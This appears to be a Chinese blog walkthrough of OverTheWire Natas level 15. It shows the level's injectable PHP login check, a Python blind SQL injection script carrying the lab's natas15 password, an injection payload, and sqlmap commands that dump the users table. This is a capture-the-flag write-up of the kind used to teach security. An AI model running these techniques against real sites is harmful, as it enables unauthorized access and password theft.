0
点赞
收藏
分享

微信扫一扫

OverTheWire攻关过程-Natas模块15


我们打开lv15,查看信息


OverTheWire攻关过程-Natas模块15_sql


可以看到有一个查询框


试一试natas15


OverTheWire攻关过程-Natas模块15_php_02


结果显示用户不存在


OverTheWire攻关过程-Natas模块15_php_03


我们查看源码


OverTheWire攻关过程-Natas模块15_sql_04



源码如下


<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>


我们大概分析下源码的作用


1、查询是否存在用户

2、前端显示错误


大神的脚本


OverTheWire攻关过程-Natas模块15_php_05


import requests
from requests.auth import HTTPBasicAuth

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = ''
passwd = ''

for char in chars:
    Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'}
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
    if 'exists' in r.text :
        filtered = filtered + char

for i in range(0,32):
    for char in filtered:
        Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
        r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
        if 'exists' in r.text :
            passwd = passwd + char
            print(passwd)
            break


我们修改下。在vs中跑


OverTheWire攻关过程-Natas模块15_sql_06


等待结果


OverTheWire攻关过程-Natas模块15_sql_07


记录密码

验证密码


OverTheWire攻关过程-Natas模块15_sql_08


我们换一种思路

使用sqlmap进行盲注


OverTheWire攻关过程-Natas模块15_sql_09


使用的payload为


index.php?debug=1&username=1" or 1 -- +


然后进行抓包保存


OverTheWire攻关过程-Natas模块15_sql_10


打开sqlmap进行盲注


python sqlmap.py -r natas16.txt --random-agent --dbms=mysql  --level=3 -p username --dump


python sqlmap.py -r natas16.txt --random-agent -p username -D natas15 -T users -C username,password --dump



OverTheWire攻关过程-Natas模块15_mysql_11


等待结果


OverTheWire攻关过程-Natas模块15_mysql_12


超时了,多试几次

举报

相关推荐

0 条评论